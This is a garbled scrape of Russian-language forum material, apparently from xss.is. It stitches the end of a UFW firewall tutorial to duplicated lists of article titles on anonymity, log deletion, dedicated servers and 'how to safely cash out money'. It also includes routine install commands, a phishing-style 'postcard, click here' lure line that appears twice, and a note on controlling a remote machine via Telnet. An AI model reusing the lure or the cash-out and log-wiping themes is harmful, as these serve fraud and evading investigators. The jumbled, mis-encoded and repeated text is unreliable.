Backing up 'before6.rules' to '/etc/ufw/before6.rules.20210705_131655'
Backing up 'after6.rules' to '/etc/ufw/after6.rules.20210705_131655'

Click to expand...

Когда вы выполняете эту команду, ваши текущие правила будут сохранены перед сбросом к профилю по умолчанию.

Заключение

В этом руководстве мы рассмотрели, что такое UFW, как установить и настроить брандмауэр UFW в Linux с помощью примеров команд. Теперь настала ваша очередь протестировать ufw на вашей машине. Я рекомендую протестировать ufw на любой виртуальной машине, прежде чем внедрять его на вашем компьютере или сервере. Ufw также имеет множество графических интерфейсов. Мы обсудим это в отдельной статье в ближайшее время.

Anonymity & Security

Авторская статья от @roxy_hide​

[ The Tor Project / Organization

[ TracGuide · Wiki · Legacy / Trac

[ Qubes OS: A reasonably secure operating system ](https://www.qubes-

[ WireGuard не работает сегодня? Сбой в работе WireGuard?

Статьи:​

Анонимный пентест. Kali linux посредством Whonix Gateway​

Что нам потребуется?​

Приступаем к осуществлению плана:​

Изменяем настройки машины (kalilinux)​

Усиливаем безопасность:​

Отключаем Tcp timestamps​

Настраиваем сеть​

​

Tor-browser​

[ How to Install Android in VirtualBox

apt install sudo

nano /etc/sudoers

sudo apt install virtualbox-6.1

apt-get install nginx

unlink /etc/nginx/sites-enabled/default

nginx -t

service nginx restart

=========== Здравствуйте! На Ваш E-mail адрес была отправлена открытка, чтобы посмотреть ее, нажмите сюда

затем можно установить то что нужно через службу Telnet, и более комфортно управлять удаленной машиной.

[ Free the internet. With the Mullvad Browser.

[ The Mullvad Browser hard facts: list of settings and modifications

Services​

Администратор Linux. Часть 1,2,3 (2020)​

Paranoid II — курс по анонимности и безопасности (2020)​

Kali Linux Tools​

Готовые связки ​

Как безопасно обналичить деньги ​

Настройка безопасной системы ​

Безопасное удаление данных ​

Безопасность Android ​

Безопасность iPhone ​

Виртуальные машины ​

Почта ​

Сервисы секретных заметок ​

SSH туннели ​

Дедики ​

Vpn ​

Прокси ​

Jabber ​

Socks (соксы, носки) ​

Зашифрованный контейнер ​

Браузеры/Тор ​

Плагины для браузера firefox ​

Linux ​

Оффлайн безопасность ​

Софт ​

Проверка системы ​

Bitcoin ​

Прочее ​

Google ​

Анонимная фриланс биржа ​

Безопасные OS ​

Видео курсы ​

Видео курсы (Vector) ​

Аудио курсы (Теодор Бодлер) ​

[ Firefox/Privacy - ArchWiki

[ Ð£Ð¼ÐµÑÐµÐ½Ð½ÑÐ¹ Hardening Ð´Ð»Ñ Firefox

История форумов​

Доказательства: почему форумы по-прежнему популярны​

Долой старье…​

Вмешательство правоохранителей​

Неадекватное поведение владельца / пользователя​

Плохое исполнение​

Новые форумы​

Сила в цифрах​

Torum​

Exploit​

XSS​

[ 11.2 GB folder on MEGA

Настройка прозрачного прокси-сервера TOR для tor-router

wget http://openvpn.net/release/openvpn-2.0.7.tar.gz

tar xvzf ./openvpn-2.0.7.tar.gz

cd ./openvpn-2.0.7

Авторская статья от @roxy_hide

Статьи:

Анонимный пентест. Kali linux посредством Whonix Gateway

Что нам потребуется?

Приступаем к осуществлению плана:

Изменяем настройки машины (kalilinux)

Усиливаем безопасность:

Отключаем Tcp timestamps

Настраиваем сеть

Tor-browser

===========
Здравствуйте! На Ваш E-mail адрес была отправлена открытка, чтобы посмотреть ее, нажмите сюда

Services

Администратор Linux. Часть 1,2,3 (2020)

Paranoid II — курс по анонимности и безопасности (2020)

Kali Linux Tools

Готовые связки

Как безопасно обналичить деньги

Настройка безопасной системы

Безопасное удаление данных

Безопасность Android

Безопасность iPhone

Виртуальные машины

Почта

Сервисы секретных заметок

SSH туннели

Дедики

Vpn

Прокси

Jabber

Socks (соксы, носки)

Зашифрованный контейнер

Браузеры/Тор

Плагины для браузера firefox

Linux

Оффлайн безопасность

Софт

Проверка системы

Bitcoin

Прочее

Google

Анонимная фриланс биржа

Безопасные OS

Видео курсы

Видео курсы (Vector)

Аудио курсы (Теодор Бодлер)

История форумов

Доказательства: почему форумы по-прежнему популярны

Долой старье…

Вмешательство правоохранителей

Неадекватное поведение владельца / пользователя

Плохое исполнение

Новые форумы

Сила в цифрах

Torum

Exploit

XSS

verb 0

Для кого предназначена эта статья?

Местоположение логов в Linux

auth.log

syslog

Настраиваем OpenVPN

Что такое OpenVPN?

Устанавливаем OpenVPN

Стоит ли автоматом ежедневно удалять логи?

Удаление логов: Почему не следует удалять /var/log

Я удалил /var/log, что делать?

Мы -> OpenVPN -> Tor

Что такое iptables?

Что такое tun0?

Что такое DNAT?

Автор grozdniyandy

Источник https://xss.is/

1. Регистрируем VPS-сервер

Авторство: defaultuser0

Источник: xss.is

Government Agencies Don’t Even Need Warrants to Spy on Tor Users

Обновите конфигурацию OpenVPN, чтобы запустить наш сервер PI-hole dns

Proxy Router

WTF